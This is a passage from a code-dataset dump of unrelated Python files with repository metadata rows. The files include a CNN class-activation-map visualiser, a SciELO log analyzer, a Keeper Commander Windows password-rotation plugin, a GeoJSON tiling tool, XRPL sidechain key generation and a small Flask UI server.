for idx,prob in zip(class_idx,probs):
cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))
cam = cam.reshape(h, w)
cam = cam - np.min(cam)
cam_img = cam / np.max(cam)
cam_img = np.uint8(255 * cam_img)
#out.setdefault(str(idx),[cv2.resize(cam_img, size_upsample),prob])
output_cam.setdefault(idx,[cv2.resize(cam_img, size_upsample),prob])
output_cam_prob.setdefault(prob,cv2.resize(cam_img,size_upsample))
output_cam_imgs.append(cv2.resize(cam_img,size_upsample))
return output_cam_imgs
def untransform(transform_img):
transform_img = transform_img.transpose(1,2,0)
transform_img *= [0.229, 0.224, 0.225]
transform_img += [0.4001, 0.4401, 0.4687]
transform_img = transform_img * 255
transform_img = transform_img.astype(np.uint8)
transform_img = transform_img[:,:,::-1]
return transform_img
def test(net, testloader):
net.eval()
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs, volatile=True), Variable(targets)
outputs, _ = net(inputs)
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
'''''''''
progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss/(batch_idx+1), 100.*correct/total, correct, total))
'''''''''
print(100.* correct/total)
return 100.*correct/total
def main():
######## load training data ########
######### action 40 ############
normalize = trans.Normalize(mean=[0.4001, 0.4401, 0.4687],
std=[0.229, 0.224, 0.225])
transform = trans.Compose([
trans.Scale((224,224)),
trans.ToTensor(),
normalize,
])
test_data = imgfolder.ImageFolder(os.path.join(configs.data_dir,'img/test'),transform=transform)
test_loader = Data.DataLoader(test_data,batch_size=configs.batch_size,
shuffle= False, num_workers= 4, pin_memory= True)
classes = {int(key): value for (key, value)
in parse_json(configs.class_info_dir).items()}
######### build vgg model ##########
vgg_cam = models.vgg_cam()
vgg_cam = vgg_cam.cuda()
checkpoint = torch.load(configs.best_ckpt_dir)
vgg_cam.load_state_dict(checkpoint['state_dict'])
# hook the feature extractor
features_blobs = []
def hook_feature(module, input, output):
features_blobs.append(output.data.cpu().numpy())
finalconv_name = 'classifier' # this is the last conv layer of the network
vgg_cam._modules.get(finalconv_name).register_forward_hook(hook_feature)
# get the softmax weight
params = list(vgg_cam.parameters())
weight_softmax = np.squeeze(params[-1].data.cpu().numpy())
save_cam_dir = os.path.join(configs.py_dir,'predict')
if not os.path.exists(save_cam_dir):
os.mkdir(save_cam_dir)
top_number = 5
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(test_loader):
inputs, targets = inputs.cuda(), targets.cuda()
transformed_img = inputs.cpu().numpy()[0]
target_name = classes[targets.cpu().numpy()[0]]
transformed_img = untransform(transformed_img)
inputs, targets = Variable(inputs, volatile=True), Variable(targets)
outputs, _ = vgg_cam(inputs)
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
h_x = F.softmax(outputs).data.squeeze()
probs, idx = h_x.sort(0, True)
prob = probs.cpu().numpy()[:top_number]
idx_ = idx.cpu().numpy()[:top_number]
OUT_CAM = returnCAM(features_blobs[-1],weight_softmax,idx_,prob)
save_fig_dir = os.path.join(save_cam_dir, 'cam_' + str(batch_idx) + '.jpg')
plt.figure(1, figsize=(8, 6))
ax = plt.subplot(231)
img1 = transformed_img[:, :, (2, 1, 0)]
ax.set_title(('{}').format(target_name),fontsize=14)
ax.imshow(img1)
for b_index, (idx,prob_in,cam) in enumerate(zip(idx_,prob,OUT_CAM)):
cl = str(classes[idx])
#save_fig_dir1 = os.path.join(save_cam_dir, 'cam_cv_' + str(batch_idx) + '_' + cl + '.jpg')
height, width, _ = transformed_img.shape
heatmap = cv2.applyColorMap(cv2.resize(cam, (width, height)), cv2.COLORMAP_JET)
result = heatmap * 0.3 + transformed_img * 0.7
ax = plt.subplot(2,3,b_index+2)
ax.imshow(result.astype(np.uint8)[:,:,(2,1,0)])
ax.set_title(('{}:{}').format(cl,('%.3f' % prob_in)), fontsize=8)
plt.savefig(save_fig_dir)
print batch_idx
print(100.* correct/total)
if __name__ == '__main__':
main()
| 33.41573 | 102 | 0.643746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 772 | 0.129792 |
e2e756023d59577863134604eb0ec0b5c6d80f25 | 15,627 | py | Python | scripts/loggeranalyzer.py | patymori/document-store-migracao | 1320ef58de1484ca8383c29c1fea55c4b2d89e67 | [
"BSD-2-Clause"
] | 1 | 2019-11-21T12:35:36.000Z | 2019-11-21T12:35:36.000Z | scripts/loggeranalyzer.py | patymori/document-store-migracao | 1320ef58de1484ca8383c29c1fea55c4b2d89e67 | [
"BSD-2-Clause"
] | 336 | 2019-04-01T14:06:37.000Z | 2022-03-21T22:16:55.000Z | scripts/loggeranalyzer.py | patymori/document-store-migracao | 1320ef58de1484ca8383c29c1fea55c4b2d89e67 | [
"BSD-2-Clause"
] | 4 | 2019-03-28T13:32:04.000Z | 2020-04-17T18:03:19.000Z | # Coding: utf-8
"""Script para analisar, agrupar dados provenientes dos logs da ferramenta
de migração das coleções SciELO."""
import argparse
import functools
import json
import logging
import re
import sys
from enum import Enum
from io import TextIOWrapper, IOBase
from typing import Callable, Dict, List, Optional, Union
import click
LOGGER_FORMAT = u"%(asctime)s %(levelname)-5.5s [%(name)s] %(message)s"
LOGGER = logging.getLogger(__name__)
class ErrorEnum(Enum):
"""Enumerador para agrupar nomes de erros utilizados na saída.
Classe enumeradora.
Atributos:
`resource-not-found`: Quando algum asset ou rendition não é encontrado
durante o empacotamento.
`xml-not-found`: Quando um documento XML não é encontrado durante o
empacotamento.
`xml-not-update`: Quando um algum erro acontece durante a atualização do
xml em questão. Geralmente são erros ligados ao LXML.
`missing-metadata`: Quando algum metadado não existe no arquivo CSV
utilizado para atualizar o XML em questão.
`missing-manifest`: Quando não é econtrado o manifest no pacote.
`xml-parser-error`: Quando existe algum erro na análise do XML.
`bundle-not-found`: Quando não é encontrado o bundle para o documento.
`issn-not-fount`: Quando não é encontrado o ISSN no documento.
`package-not-import`: Quando o pacote não pode ser importado por qualquer erro.
Atributos:
Não há atributos.
"""
RESOURCE_NOT_FOUND = "resource-not-found"
NOT_UPDATED = "xml-not-update"
XML_NOT_FOUND = "xml-not-found"
MISSING_METADATA = "missing-metadata"
MISSING_MANIFEST = "missing-manifest"
XML_PARSER_ERROR = "xml-parser-error"
BUNDLE_NOT_FOUND = "bundle-not-found"
ISSN_NOT_FOUND = "issn-not-found"
PACKAGE_NOT_IMPORTED = "package-not-import"
class LoggerAnalyzer(object):
def __init__(self, in_file, out_file=None, log_format=None, out_formatter=None):
self.in_file = in_file
self.out_file = out_file
self.content = ""
self.out_formatter = self.set_formatter(out_formatter)
self.log_format = (
log_format if log_format else "<date> <time> <level> <module> <message>"
)
@classmethod
def formatters(cls) -> Optional[Dict]:
return {"jsonl": cls.json_formatter}
def logformat_regex(self) -> (List[str], re.Pattern):
"""
Método responsável por criar uma expressão regular para dividir as
menssagens de log semanticamente.
Args:
format: formato de saída que será utilizado.
Retornos:
header, regex
header: cabeçalho do formato do log.
regex: expressão regular do formato.
None: em caso de não "casamento"
Exemplo:
re.compile('^(?P<Date>.*?)
\\s+(?P<Time>.*?)
\\s+(?P<Error>.*?)
\\s+(?P<Module>.*?)
\\s+(?P<Message>.*?)$')
Exceções:
Não lança exceções.
"""
headers = []
splitters = re.split(r"(<[^<>]+>)", self.log_format)
regex = ""
for k in range(len(splitters)):
if k % 2 == 0:
splitter = re.sub(" +", "\\\s+", splitters[k])
regex += splitter
else:
header = splitters[k].strip("<").strip(">")
regex += "(?P<%s>.*?)" % header
headers.append(header)
regex = re.compile("^" + regex + "$")
return headers, regex
def load(self) -> None:
"""
Realiza a leitura do conteúdo do arquivo.
"""
if isinstance(self.in_file, IOBase):
self.content = self.in_file.readlines()
def parse(self, format=None) -> None:
raise NotImplementedError("Uma instância de LoggerAnalyzer deve implementar o método parse.")
def parser(
self, line: str, regex: re.Pattern, error: ErrorEnum, group: str = None
) -> Optional[Dict]:
"""
Analise do formato utilizado para verificar padrões por meio
de expressões regulares. Retorna o tipo de formato especificado na chamada.
Args:
line: Linha a ser analisada.
regex: Expressão regular que será utilizada.
error: Um enumerador, instância de classe ErroEnum, para qualificar o erro.
group: Um classificador para o erro.
Retorno:
Um dicionário contendo a analise da linha com um seperação semântica.
Exemplo:
{
'pid': 'S0066-782X2020000500001',
'uri': 'bases/pdf/abc/v114n4s1/pt_0066-782X-abc-20180130.pdf',
'xml': '0066-782X-abc-20180130.xml',
'error': 'resource-not-found',
'group': 'renditions'
}
Exceções:
Não lança exceções.
"""
match = regex.match(line)
if match is None:
return None
return dict(match.groupdict(), **{"error": error.value, "group": group})
def tokenize(
self, extra_parsers: List[Callable] = None
) -> List[Optional[Dict]]:
"""
Realiza o parser do arquivo de log.
Dado um arquivo de formato conhecido, esta função produz uma lista
de dicionários. Os dicionários comportam ao menos quatro tipos de erros
registrados no LOG.
Args:
extra_parsers = Lista de dicionário que contenha as chaves:
`regex` e `error `
Exemplo de uso:
self.tokenize([
{"regex": MANIFEST_NOT_FOUND, "error": ErrorEnum.MISSING_MANIFEST},
])
Retorno:
Retorna uma lista de dicionário com a avaliação das linhas fornecida
pelo atributo de classe ``self.content`ˆ.
Exemplo de retorno:
>>> [{'assets': ['imagem.tif'], 'pid': 'S1981-38212017000200203', 'error': 'resource'}]
Exceções:
Não lança exceções.
"""
errors: List[Optional[Dict]] = []
documents_errors: Dict[str, Dict] = {}
for line in self.content:
line = line.strip()
_, regex = self.logformat_regex()
match = regex.match(line)
if match:
format_dict = match.groupdict()
for params in extra_parsers:
data = self.parser(format_dict['message'], **params)
if data is not None:
pid: Optional[str] = data.get("pid")
error: ErrorEnum = data.get("error")
uri: Optional[str] = data.get("uri")
level: Optional[str] = format_dict.get("level")
time: Optional[str] = format_dict.get("time")
date: Optional[str] = format_dict.get("date")
exception: Optional[str] = format_dict.get("exception")
group = data.pop("group", error)
if pid is not None:
documents_errors.setdefault(pid, {})
documents_errors[pid].setdefault(group, [])
documents_errors[pid][group].append(uri)
documents_errors[pid]["pid"] = pid
documents_errors[pid]["error"] = error
documents_errors[pid]["level"] = level
documents_errors[pid]["time"] = time
documents_errors[pid]["date"] = date
elif error != ErrorEnum.RESOURCE_NOT_FOUND:
data["level"] = level
data["time"] = time
data["date"] = date
errors.append(data)
break
else:
# Linha que não foi identificada como erro de empacotamento
LOGGER.debug(
"Não foi possível analisar a linha '%s', talvez seja necessário especificar um analisador.",
line,
)
documents_errors_values = list(documents_errors.values())
errors.extend(documents_errors_values)
return errors
def dump(self, lines) -> None:
"""Escreve resultado do parser em um arquivo caminho determinado.
A sequência de caracteres de dados deve implementar a interface TextIOWrapper
Args:
lines: Lista de linhas contento sequência de caracteres.
Retornos:
Não há retorno
Exceções:
Não lança exceções.
"""
for line in lines:
self.out_file.write(line)
self.out_file.write("\n")
def json_formatter(self, errors: List[Optional[Dict]]) -> List[str]:
"""
Imprime linha a linha da lista de entrada, convertendo o conteúdo para
JSON.
Args:
errors: Lista de dicionários contendo os erro semânticamente identificado.
Retornos:
Retorna um JSON correspondente a cada dicionário do argumento errors,
example:
{"uri": "jbn/nahead/2175-8239-jbn-2019-0218.xml", "error": "xml-not-found"}
{"uri": "jbn/nahead/2175-8239-jbn-2020-0025.xml", "error": "xml-not-found"}
{"uri": "jbn/nahead/2175-8239-jbn-2019-0236.xml", "error": "xml-not-found"}
{"uri": "jbn/nahead/2175-8239-jbn-2020-0050.xml", "error": "xml-not-found"}
{"uri": "jbn/nahead/2175-8239-jbn-2020-0014.xml", "error": "xml-not-found"}
Exceções:
Não lança exceções.
"""
result = []
for error in errors:
result.append(json.dumps(error))
return result
def set_formatter(self, format) -> formatters:
return LoggerAnalyzer.formatters().get(format, self.json_formatter)
class AnalyzerImport(LoggerAnalyzer):
# IMPORT_REGEX
manifest_not_found = re.compile(
r".*No such file or directory: '(?P<file_path>[^']+)'",
re.IGNORECASE,
)
xml_not_into_package = re.compile(
r".*There is no XML file into package '(?P<package_path>[^']+)",
re.IGNORECASE,
)
xml_parser_error = re.compile(
r".*Could not parse the '(?P<file_path>[^']+)' file",
re.IGNORECASE,
)
bundle_not_found = re.compile(
r".*The bundle '(?P<bundle>[^']+)' was not updated.",
re.IGNORECASE,
)
issn_not_found = re.compile(
r".*No ISSN in document '(?P<pid>[^']+)'",
re.IGNORECASE,
)
package_not_imported = re.compile(
r".*Could not import package '(?P<package_path>[^']+).*'",
re.IGNORECASE,
)
def parse(self, format=None) -> None:
"""
Método realiza a análise.
Args:
format: formato de saída que será utilizado.
Retornos:
Não há retorno
Exceções:
Não lança exceções.
"""
parsers = [
{"regex": self.manifest_not_found, "error": ErrorEnum.MISSING_MANIFEST},
{"regex": self.xml_not_into_package, "error": ErrorEnum.XML_NOT_FOUND},
{"regex": self.xml_parser_error, "error": ErrorEnum.XML_PARSER_ERROR},
{"regex": self.bundle_not_found, "error": ErrorEnum.BUNDLE_NOT_FOUND},
{"regex": self.issn_not_found, "error": ErrorEnum.ISSN_NOT_FOUND},
{"regex": self.package_not_imported, "error": ErrorEnum.PACKAGE_NOT_IMPORTED},
]
self.load()
formatter = self.set_formatter(format)
tokenized_lines = self.tokenize(extra_parsers=parsers)
lines = formatter(tokenized_lines)
self.dump(lines)
class AnalyzerPack(LoggerAnalyzer):
# PACKAGE_FROM_SITE REGEX
asset_not_found_regex = re.compile(
r".*\[(?P<pid>S\d{4}-.*)\].*Could not find asset "
r"'(?P<uri>[^']+)'.*'(?P<xml>[^']+)'.?$",
re.IGNORECASE,
)
rendition_not_found_regex = re.compile(
r".*\[(?P<pid>S\d{4}-.*)\].*Could not find rendition "
r"'(?P<uri>[^']+)'.*'(?P<xml>[^']+)'.?$",
re.IGNORECASE,
)
xml_not_found_regex = re.compile(
r".*Could not find the XML file '(?P<uri>[^']+)'.?", re.IGNORECASE
)
xml_not_updated_regex = re.compile(
r".*Could not update xml '(?P<uri>[^']+)'.?"
r"( The exception '(?P<exception>[^']+)')?",
re.IGNORECASE,
)
xml_missing_metadata_regex = re.compile(
r".*Missing \"(?P<metadata>[\w\s]+)\".* \"(?P<uri>[^']+)\"", re.IGNORECASE
)
def parse(self, format=None) -> None:
"""
Método realiza a análise.
Args:
format: formato de saída que será utilizado.
Retornos:
Não há retorno
Exceções:
Não lança exceções.
"""
parsers = [
{
"regex": self.asset_not_found_regex,
"error": ErrorEnum.RESOURCE_NOT_FOUND,
"group": "renditions",
},
{
"regex": self.rendition_not_found_regex,
"error": ErrorEnum.RESOURCE_NOT_FOUND,
"group": "renditions",
},
{"regex": self.xml_not_updated_regex, "error": ErrorEnum.NOT_UPDATED},
{"regex": self.xml_not_found_regex, "error": ErrorEnum.XML_NOT_FOUND},
{"regex": self.xml_missing_metadata_regex, "error": ErrorEnum.MISSING_METADATA},
]
self.load()
formatter = self.set_formatter(format)
tokenized_lines = self.tokenize(extra_parsers=parsers)
lines = formatter(tokenized_lines)
self.dump(lines)
@click.command()
@click.argument("input", type=click.File("r"), required=True)
@click.option(
"-f",
"--formatter",
default="jsonl",
type=click.Choice(LoggerAnalyzer.formatters().keys()),
help="Escolha um formato de conversão para o analisador",
)
@click.option(
"-s",
"--step",
required=True,
type=click.Choice(['pack', 'import']),
help="Escolha o passo que deseja analisar",
)
@click.option(
"--log_format",
default="<date> <time> <level> <module> <message>",
type=click.STRING,
help="Define o formato do log. Padrão: <date> <time> <level> <module> <message>.",
)
@click.option(
"--log_level",
default="WARNING",
type=click.Choice(["NOTSET", "DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]),
help="Defini o nível de log de excecução. Padrão WARNING.",
)
@click.argument("output", type=click.File("w"), required=False)
def main(input, step, formatter, log_format, output, log_level):
"""
Document Store Migration (DSM) - Log Analyzer
Realiza a leitura dos arquivo de log da fase de empacotamento e importação
da migração dos artigos do DSM.
O resultado final desse analisador é um arquivo no formato JSONL onde nós
permite realizar consultas com mais expressividade nos logs.
"""
logging.basicConfig(format=LOGGER_FORMAT, level=getattr(logging, log_level.upper()))
if not output:
output = sys.stdout
if step == 'pack':
parser = AnalyzerPack(input, output, log_format, out_formatter=formatter)
parser.parse()
elif step == 'import':
parser = AnalyzerImport(input, output, log_format, out_formatter=formatter)
parser.parse()
if __name__ == "__main__":
main()
| 32.488565 | 112 | 0.568823 | 13,554 | 0.86008 | 0 | 0 | 1,796 | 0.113967 | 0 | 0 | 7,744 | 0.491402 |
e2e7e55d22649bca4fb42e3ec2dfab9577ef8761 | 786 | py | Python | keepercommander/plugins/windows/windows.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | 151 | 2015-11-02T02:04:46.000Z | 2022-01-20T00:07:01.000Z | keepercommander/plugins/windows/windows.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | 145 | 2015-12-31T00:11:35.000Z | 2022-03-31T19:13:54.000Z | keepercommander/plugins/windows/windows.py | Mkn-yskz/Commandy | e360306f41112534ae71102658f560fd974a1f45 | [
"MIT"
] | 73 | 2015-10-30T00:53:10.000Z | 2022-03-30T03:50:53.000Z | # -*- coding: utf-8 -*-
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Copyright 2015 Keeper Security Inc.
# Contact: ops@keepersecurity.com
#
import logging
import subprocess
import re
def rotate(record, newpassword):
""" Grab any required fields from the record """
i = subprocess.call(["net", "user", record.login, newpassword], shell=True)
if i == 0:
logging.info('Password changed successfully')
record.password = newpassword
return True
logging.error('Password change failed')
return True
def adjust(newpassword):
# the characters below mess with windows command line
return re.sub('[<>&|]', '', newpassword)
| 22.457143 | 79 | 0.603053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 421 | 0.534943 |
e2e80352d380fdeb17dfc45676bbe0034a2b92a7 | 188 | py | Python | tests/twodim/test_synthetic.py | microprediction/punting | 5de62913f8eb9777df1d465db0f2d606a3d19c42 | [
"MIT"
] | null | null | null | tests/twodim/test_synthetic.py | microprediction/punting | 5de62913f8eb9777df1d465db0f2d606a3d19c42 | [
"MIT"
] | null | null | null | tests/twodim/test_synthetic.py | microprediction/punting | 5de62913f8eb9777df1d465db0f2d606a3d19c42 | [
"MIT"
] | null | null | null | from punting.twodim.twosynthetic import random_harville_market
def test_synthetic():
n = 7
m = random_harville_market(n=n, scr=-1)
if __name__=='__main__':
test_synthetic() | 18.8 | 62 | 0.728723 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.053191 |
e2e85a1c47f7391da6709f39642b315c415006ac | 488 | py | Python | synapsesuggestor/pipelinefiles.py | clbarnes/CATMAID-synapsesuggestor | 7b9ffd96c034ca47a6567ebbeb0eff4ece44cb33 | [
"MIT"
] | 3 | 2017-07-27T20:33:14.000Z | 2018-11-09T11:14:24.000Z | synapsesuggestor/pipelinefiles.py | clbarnes/CATMAID-synapsesuggestor | 7b9ffd96c034ca47a6567ebbeb0eff4ece44cb33 | [
"MIT"
] | 10 | 2017-09-29T14:43:32.000Z | 2018-11-13T19:19:22.000Z | synapsesuggestor/pipelinefiles.py | clbarnes/CATMAID-synapsesuggestor | 7b9ffd96c034ca47a6567ebbeb0eff4ece44cb33 | [
"MIT"
] | 1 | 2018-06-15T19:12:55.000Z | 2018-06-15T19:12:55.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""Specifies static assets (CSS, JS) required by the CATMAID front-end.
This module specifies all the static files that are required by the
synapsesuggestor front-end.
"""
from collections import OrderedDict
JAVASCRIPT = OrderedDict()
JAVASCRIPT['synapsesuggestor'] = {
'source_filenames': (
'synapsesuggestor/js/widgets/synapse-detection-table.js',
),
'output_filename': 'js/synapsesuggestor.js'
}
| 24.4 | 71 | 0.733607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 328 | 0.672131 |
e2e89b4c74cc43eb212301d0985561c61c01688a | 3,019 | py | Python | code/tile/tile_geojson.py | kylebarron/transit-land-dump | 56114a21e4cb6edaaadc0bb220f883cf71288997 | [
"MIT"
] | 21 | 2020-02-09T08:18:16.000Z | 2022-01-07T23:38:33.000Z | code/tile/tile_geojson.py | kylebarron/all-trans | 56114a21e4cb6edaaadc0bb220f883cf71288997 | [
"MIT"
] | 49 | 2020-02-08T21:57:19.000Z | 2020-03-02T18:57:14.000Z | code/tile/tile_geojson.py | kylebarron/transit-land-dump | 56114a21e4cb6edaaadc0bb220f883cf71288997 | [
"MIT"
] | 1 | 2021-02-23T21:53:00.000Z | 2021-02-23T21:53:00.000Z | from pathlib import Path
import click
import cligj
import geojson
import mercantile
from shapely.geometry import asShape, box
from shapely.ops import split
@click.command()
@cligj.features_in_arg
@click.option(
'-z',
'--min-zoom',
type=int,
required=True,
help='Min zoom level to create tiles for',
)
@click.option(
'-Z',
'--max-zoom',
type=int,
required=True,
help='Max zoom level to create tiles for (inclusive)',
)
@click.option(
'-d',
'--tile-dir',
type=click.Path(file_okay=False, dir_okay=True, writable=True))
@click.option(
'--allowed-geom-type',
type=str,
required=False,
multiple=True,
default=[],
help='Geometry types to keep in exported GeoJSON features.')
def cut_geojson(features, min_zoom, max_zoom, tile_dir, allowed_geom_type):
"""Cut GeoJSON features into xyz tiles
"""
geometry_types = [
'Point', 'MultiPoint', 'LineString', 'MultiLineString', 'Polygon',
'MultiPolygon']
if not all(t in geometry_types for t in allowed_geom_type):
raise ValueError(f'allowed_geom_type must be one of: {geometry_types}')
tile_dir = Path(tile_dir)
for feature in features:
geometry = asShape(feature['geometry'])
tiles = find_tiles(geometry, min_zoom, max_zoom)
for tile in tiles:
clipped_geometries = clip_geometry_to_tile(geometry, tile)
new_features = []
for clipped_geometry in clipped_geometries:
if allowed_geom_type:
geom_type = clipped_geometry.type
if geom_type not in allowed_geom_type:
print(f'Skipping feature of type: {geom_type}')
continue
new_features.append(
geojson.Feature(
geometry=clipped_geometry,
properties=feature['properties']))
# Write feature to tile_dir
this_tile_dir = (tile_dir / str(tile.z) / str(tile.x))
this_tile_dir.mkdir(parents=True, exist_ok=True)
with open(this_tile_dir / f'{str(tile.y)}.geojson', 'a') as f:
for new_feature in new_features:
f.write(geojson.dumps(new_feature, separators=(',', ':')))
f.write('\n')
def find_tiles(geometry, min_zoom, max_zoom):
assert min_zoom <= max_zoom, 'min zoom must be <= max zoom'
selected_tiles = []
bound_tiles = mercantile.tiles(
*geometry.bounds, zooms=range(min_zoom, max_zoom + 1))
for tile in bound_tiles:
if box(*mercantile.bounds(tile)).intersects(geometry):
selected_tiles.append(tile)
return selected_tiles
def clip_geometry_to_tile(geometry, tile):
tile_geom = box(*mercantile.bounds(tile))
# Geometry collection of split objects
split_gc = split(geometry, tile_geom)
return [g for g in split_gc if tile_geom.contains(g)]
if __name__ == '__main__':
cut_geojson()
| 29.31068 | 79 | 0.623716 | 0 | 0 | 0 | 0 | 2,180 | 0.722093 | 0 | 0 | 581 | 0.192448 |
e2e918a6f7ddc309c080d77ca6f1ab09dd2b6ed5 | 2,262 | py | Python | slk/config/network.py | QCloud-DevOps/sidechain-launch-kit | ee41524b65042b2f33ded4997fb34cea9e4e560c | [
"ISC"
] | 1 | 2021-12-12T02:15:37.000Z | 2021-12-12T02:15:37.000Z | slk/config/network.py | QCloud-DevOps/sidechain-launch-kit | ee41524b65042b2f33ded4997fb34cea9e4e560c | [
"ISC"
] | null | null | null | slk/config/network.py | QCloud-DevOps/sidechain-launch-kit | ee41524b65042b2f33ded4997fb34cea9e4e560c | [
"ISC"
] | null | null | null | from __future__ import annotations
from typing import List, Optional
from xrpl import CryptoAlgorithm
from xrpl.core.addresscodec import encode_account_public_key, encode_node_public_key
from xrpl.core.keypairs import derive_keypair, generate_seed
from xrpl.wallet import Wallet
from slk.config.helper_classes import Keypair, Ports
class Network:
def __init__(self: Network, num_nodes: int, start_cfg_index: int) -> None:
self.num_nodes = num_nodes
self.validator_keypairs = self._generate_node_keypairs()
self.ports = [Ports(start_cfg_index + i) for i in range(self.num_nodes)]
def _generate_node_keypairs(self: Network) -> List[Keypair]:
"""generate keypairs suitable for validator keys"""
result = []
for i in range(self.num_nodes):
seed = generate_seed(None, CryptoAlgorithm.SECP256K1)
pub_key, priv_key = derive_keypair(seed, True)
result.append(
Keypair(
public_key=encode_node_public_key(bytes.fromhex(pub_key)),
secret_key=seed,
account_id=None,
)
)
return result
class SidechainNetwork(Network):
def __init__(
self: SidechainNetwork,
num_federators: int,
start_cfg_index: int,
num_nodes: Optional[int] = None,
) -> None:
super().__init__(num_nodes or num_federators, start_cfg_index)
self.num_federators = num_federators
self.federator_keypairs = self._generate_federator_keypairs()
self.main_account = Wallet.create(CryptoAlgorithm.SECP256K1)
def _generate_federator_keypairs(self: SidechainNetwork) -> List[Keypair]:
"""generate keypairs suitable for federator keys"""
result = []
for i in range(self.num_federators):
wallet = Wallet.create(crypto_algorithm=CryptoAlgorithm.ED25519)
result.append(
Keypair(
public_key=encode_account_public_key(
bytes.fromhex(wallet.public_key)
),
secret_key=wallet.seed,
account_id=wallet.classic_address,
)
)
return result
| 36.483871 | 84 | 0.637931 | 1,921 | 0.849248 | 0 | 0 | 0 | 0 | 0 | 0 | 102 | 0.045093 |
e2e99f84c3210071c41b2ad1656cb8ddb4605446 | 5,132 | py | Python | realpyserver/server.py | MartinChristiaan/realpy | b53c53b3d40298d1c20118d770f52e9d8402c634 | [
"MIT"
] | null | null | null | realpyserver/server.py | MartinChristiaan/realpy | b53c53b3d40298d1c20118d770f52e9d8402c634 | [
"MIT"
] | null | null | null | realpyserver/server.py | MartinChristiaan/realpy | b53c53b3d40298d1c20118d770f52e9d8402c634 | [
"MIT"
] | null | null | null | from flask import Flask,Response
from flask import render_template
import os
from os import path,system
from flask import request
import json
from flask_cors import CORS
import shutil
# Model Definition
import math
import serialization
import numpy as np
import types
from enum import Enum
import video_capture
#pathToPython = "C:\\Users\\marti\\Source\\Repos\\VideoHeartbeatInterface\\src\\pythonTypes.fs"
def create_type_provider(classlibrary,pathToPython):
lines = ["module PythonTypes \n"]
lines +=["type ClassName = string \n"]
lines +=["type FieldName = string \n"]
lines +=["type EnumName = FieldName \n"]
lines +=["type EnumOptions = string list \n"]
lines +=["type MethodName = FieldName \n"]
for c in classlibrary:
classname = type(c).__name__
for field in dir(c):
attr = getattr(c,field)
if type(attr)== types.MethodType:
lines+=["let " + classname + "_"+ str(field) + " : ClassName*MethodName = \"" + classname+"\",\"" + str(field)+"\" \n"]
elif isinstance(attr, Enum):
choices = "\";\"".join(dir(type(attr))[:-4])
print(choices)
lines+=["let " + classname + "_"+ str(field) + " : ClassName*EnumName = \"" + classname+"\",\"" + str(field)+"\" \n"]
lines+=["let " + classname + "_"+ str(field) + "_options : EnumOptions = [\"" + choices + "\"] \n"]
else:
lines+=["let " + classname + "_"+ str(field) + " : ClassName*FieldName = \"" + classname+"\",\"" + str(field)+"\" \n"]
f = open(pathToPython,"w")
f.writelines(lines)
def setup_template(pathToClient,use_camera):
if os.path.exists(pathToClient):
pass
else:
print("copying")
shutil.copytree("PyTypeClient",pathToClient)
if not use_camera:
htmlfile = pathToClient + "/public/index.html"
f = open(htmlfile,'r')
lines = f.readlines()
f.close()
f = open(htmlfile,'w')
del lines[25]
f.writelines(lines)
f.close()
def create_server(classlibrary,main,pathToClient,use_camera=True):
"""Receives list of uiElements that handle interaction with their specified classes"""
# Check if a path can be found,otherwize create the app
if use_camera:
video_capture.main = main
else:
# repeat within loop
pass
setup_template(pathToClient,use_camera)
app = Flask(__name__)
CORS(app)
uiElements = []
classnames = [type(c).__name__ for c in classlibrary]
classlookup = dict(zip(classnames, classlibrary))
create_type_provider(classlibrary,pathToClient + "/src/pythonTypes.fs")
@app.route("/")
@app.route('/getTargets',methods=['PUT'])
def get_targets():
classnamescol = request.form['classname'].split('/')
fieldnamescol = request.form['fieldname'].split('/')
data = []
for (classnames,fieldnames) in zip(classnamescol,fieldnamescol):
subclassnames = classnames.split()
subfieldnames = fieldnames.split()
subdata = []
for (classname,fieldname) in zip(subclassnames,subfieldnames):
item = classlookup[classname].__dict__[fieldname]
if isinstance(item, list) or isinstance(item,np.ndarray):
liststring = [str(el) for el in item]
subdata.append("@".join(liststring))
else:
subdata.append(str(item))
data.append(",".join(subdata))
#print(data)
return "/".join(data)
@app.route('/updateTarget',methods=['PUT'])
def update_target():
classname = request.form['classname']
fieldname = request.form['fieldname']
valuetype = request.form['valuetype']
value = request.form['value']
if valuetype == "float":
classlookup[classname].__dict__[fieldname] = float(value)
if valuetype == "bool":
value = classlookup[classname].__dict__[fieldname]
classlookup[classname].__dict__[fieldname] = not value
if valuetype == "string":
classlookup[classname].__dict__[fieldname] = value
if valuetype == "enum":
enum = classlookup[classname].__dict__[fieldname]
classlookup[classname].__dict__[fieldname] = type(enum)[value]
return ""
@app.route('/invokeMethod',methods=['PUT'])
def invoke_method():
classname = request.form['classname']
method = request.form['method']
getattr(classlookup[classname], method)()
return ""
def gen(camera):
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video_feed')
def video_feed():
return Response(gen(video_capture.Camera()),
mimetype='multipart/x-mixed-replace; boundary=frame')
return app
| 36.397163 | 135 | 0.585347 | 0 | 0 | 2,989 | 0.582424 | 2,137 | 0.416407 | 0 | 0 | 1,046 | 0.203819 |
